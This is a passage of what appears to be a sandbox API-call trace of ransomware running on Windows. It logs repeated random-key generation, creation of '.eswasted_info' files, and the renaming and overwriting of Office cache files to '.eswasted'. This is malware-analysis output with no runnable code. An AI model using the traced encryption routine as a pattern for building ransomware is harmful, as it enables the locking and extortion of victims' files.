szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.108] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.108] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.108] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.109] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.109] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.117] SetEndOfFile (hFile=0x108) returned 1 [0072.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.119] CloseHandle (hObject=0x108) returned 1 [0072.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0072.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c358 | out: hHeap=0x6d0000) returned 1 [0072.121] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.122] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.122] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.122] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0072.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c0) returned 0x6f5cc0 [0072.122] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.122] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.123] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.123] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.123] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.123] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.124] SetEndOfFile (hFile=0x108) returned 1 [0072.124] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.124] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.124] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted")) returned 1 [0072.130] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.130] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.130] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xaec3a [0072.130] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x16b0000 [0072.130] CloseHandle (hObject=0x118) returned 1 [0072.158] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.159] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.159] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.159] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.160] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.160] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.168] SetEndOfFile (hFile=0x108) returned 1 [0072.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.172] CloseHandle (hObject=0x108) returned 1 [0072.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b680 | out: hHeap=0x6d0000) returned 1 [0072.174] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.175] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.175] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.175] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0072.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x6f65b8 [0072.175] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.175] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.176] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.176] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.176] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.176] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.177] SetEndOfFile (hFile=0x108) returned 1 [0072.177] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.178] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.178] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.eswasted")) returned 1 [0072.185] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.185] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.185] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x41d4 [0072.185] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41d4) returned 0x330000 [0072.186] CloseHandle (hObject=0x10c) returned 1 [0072.190] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.191] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.191] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.191] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.192] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.192] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.202] SetEndOfFile (hFile=0x108) returned 1 [0072.205] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.205] CloseHandle (hObject=0x108) returned 1 [0072.206] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0072.207] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b790 | out: hHeap=0x6d0000) returned 1 [0072.207] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.208] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.208] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.208] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0072.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x6f5cc0 [0072.208] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.208] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.208] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.209] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.209] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.209] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.210] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.211] SetEndOfFile (hFile=0x108) returned 1 [0072.211] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.211] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.211] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0072.212] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.212] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.212] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x7976 [0072.212] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7976) returned 0x330000 [0072.213] CloseHandle (hObject=0x118) returned 1 [0072.218] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.219] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.219] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.219] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.219] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.219] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.228] SetEndOfFile (hFile=0x108) returned 1 [0072.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.230] CloseHandle (hObject=0x108) returned 1 [0072.231] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.231] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0072.231] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.232] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.232] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.232] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0072.232] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x6f65b8 [0072.233] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.233] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.233] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.233] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.233] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.233] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.234] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.235] SetEndOfFile (hFile=0x108) returned 1 [0072.235] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.236] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.236] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted")) returned 1 [0072.236] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.236] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.236] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x10b2 [0072.236] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x330000 [0072.236] CloseHandle (hObject=0x10c) returned 1 [0072.239] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.239] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.239] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.239] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.240] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.240] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.250] SetEndOfFile (hFile=0x108) returned 1 [0072.252] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.252] CloseHandle (hObject=0x108) returned 1 [0072.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0072.253] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c458 | out: hHeap=0x6d0000) returned 1 [0072.253] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.254] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.254] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.254] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0072.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c0) returned 0x6f5cc0 [0072.254] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.254] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.254] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.255] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.255] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.255] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.256] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.256] SetEndOfFile (hFile=0x108) returned 1 [0072.257] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.257] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.257] lstrcpyW (in: lpString1=0x6f5d76, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.257] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted")) returned 1 [0072.259] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.259] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.259] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xaec3a [0072.259] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x16b0000 [0072.259] CloseHandle (hObject=0x118) returned 1 [0072.285] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.286] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.286] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.287] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.287] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.288] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.301] SetEndOfFile (hFile=0x108) returned 1 [0072.304] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.304] CloseHandle (hObject=0x108) returned 1 [0072.306] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.306] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312990 | out: hHeap=0x6d0000) returned 1 [0072.306] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 